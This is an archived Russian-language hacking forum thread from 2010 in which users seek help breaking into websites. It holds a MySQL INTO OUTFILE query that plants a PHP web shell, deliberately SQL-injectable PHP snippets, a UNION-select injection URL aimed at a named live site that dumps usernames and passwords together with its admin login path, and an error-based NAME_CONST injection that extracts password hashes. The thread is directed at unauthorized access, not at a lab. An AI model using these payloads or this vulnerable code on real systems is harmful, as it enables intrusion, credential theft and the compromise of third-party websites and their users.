ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 07.03.2010, 18:27
Quicky
Новичок
Регистрация: 27.09.2007
Сообщений: 10
Провел на форуме:
33287

Репутация: 0
По умолчанию

Вобще прощу помощи есть база данных от сайта, типа db_user, db_pass, db_host ну и т.д., Движок ДЛЕ, но шелла нет ( Подскажите можно ли как то взломать?
 
Ответить с цитированием

  #2  
Старый 07.03.2010, 19:34
[Feldmarschall]
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
Провел на форуме:
568388

Репутация: 87
По умолчанию

что взломать?
 
Ответить с цитированием

  #3  
Старый 07.03.2010, 20:46
scorpic393
Banned
Регистрация: 05.02.2010
Сообщений: 70
Провел на форуме:
177258

Репутация: 5
По умолчанию

Подскажите плиз, точнее напишите мне пожалуйста самый примитивный скрипт с blind sql-inj. Я чёто начал писать, но ошибка выводиться токо при подстановки ковычек. помогит плиз
PHP код:
<?php
...
if(isset(
$_GET['type']))
{
    
$response=mysql_query("SELECT * FROM news WHERE type='".$_GET['type']."'");
    
$result=mysql_fetch_array($response);
}
...
?>
 
Ответить с цитированием

  #4  
Старый 07.03.2010, 20:51
.:[melkiy]:.
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740

Репутация: 912
По умолчанию

Цитата:
Сообщение от scorpic393  
Подскажите плиз, точнее напишите мне пожалуйста самый примитивный скрипт с blind sql-inj. Я чёто начал писать, но ошибка выводиться токо при подстановки ковычек. помогит плиз
PHP код:
<?php
...
if(isset(
$_GET['type']))
{
    
$response=mysql_query("SELECT * FROM news WHERE type='".$_GET['type']."'");
    
$result=mysql_fetch_array($response);
}
...
?>
PHP код:
<?php 
... 
if(isset(
$_GET['type'])) 

    
$response=mysql_query("SELECT count(*) FROM news WHERE type='".$_GET['type']."'"); 
    
$result=mysql_fetch_array($response); 

... 
?>
 
Ответить с цитированием

  #5  
Старый 07.03.2010, 21:31
navai
Новичок
Регистрация: 24.12.2008
Сообщений: 12
Провел на форуме:
32210

Репутация: 1
По умолчанию

Люди, подскажите, есть доступ к mysql , рутовский как бы.

но не знаю как залить шелл на сайт, посоветовали через запрос
select '<?php eval(system($_GET[v]));?>' from mysql.user into outfile 'директория\фаил.пхп';

но не могу найти папку с правами на залив.

что делать?
 
Ответить с цитированием

  #6  
Старый 07.03.2010, 21:43
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557

Репутация: 606


По умолчанию

Цитата:
Сообщение от navai  
Люди, подскажите, есть доступ к mysql , рутовский как бы.

но не знаю как залить шелл на сайт, посоветовали через запрос
select '<?php eval(system($_GET[v]));?>' from mysql.user into outfile 'директория\фаил.пхп';

но не могу найти папку с правами на залив.

что делать?

http://tinyurl.com/yb2gm96
 
Ответить с цитированием

  #7  
Старый 07.03.2010, 23:53
scorpic393
Banned
Регистрация: 05.02.2010
Сообщений: 70
Провел на форуме:
177258

Репутация: 5
По умолчанию

Почему не логиниться???

http://www.sflcn.com/admin

выдрал логин пасс

Цитата:
http://www.sflcn.com/story.php?id=-8069+union+select+1,2,group_concat%28username,0x3a ,userpassword%29,4,5,6,7,8+from+users
Попробуйте плиз. может у меня руки кривые
 
Ответить с цитированием

  #8  
Старый 08.03.2010, 01:25
Napas
Новичок
Регистрация: 30.11.2008
Сообщений: 15
Провел на форуме:
115871

Репутация: 16
По умолчанию

2 scorpic393
во-первых, не всегда данные из таблицы подойдут к админке( мб просто данные для входа в нее в другой таблице ) , во-вторых, в данном случае на админку стоит бейсик-авторизация, что в 90% случаев, означает, что пассворд хранится не в бд, а в файле .htpasswd
такие дела
 
Ответить с цитированием

  #9  
Старый 08.03.2010, 01:40
j0ker13
Участник форума
Регистрация: 28.07.2008
Сообщений: 199
Провел на форуме:
861008

Репутация: 58
По умолчанию

Цитата:
на админку стоит бейсик-авторизация, что в 90% случаев, означает, что пассворд хранится не в бд, а в файле .htpasswd
такие дела
90%?)) имхо ты ошибаешся
 
Ответить с цитированием

  #10  
Старый 08.03.2010, 12:18
Darren
Banned
Регистрация: 14.06.2008
Сообщений: 34
Провел на форуме:
119183

Репутация: 13
Отправить сообщение для Darren с помощью ICQ
По умолчанию

Вот таким образом выводится нужные мне значения но по одному, меняя лимит

UNION SELECT * FROM(SELECT * FROM (SELECT NAME_CONST((SELECT password FROM user LIMIT 1), 14)d) as t JOIN(SELECT NAME_CONST((SELECT password FROM user LIMIT 1),14)e)b)a


Каким образом можно вывести весь список сразу? intooutfile доступ запрещён для этого юзверя.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ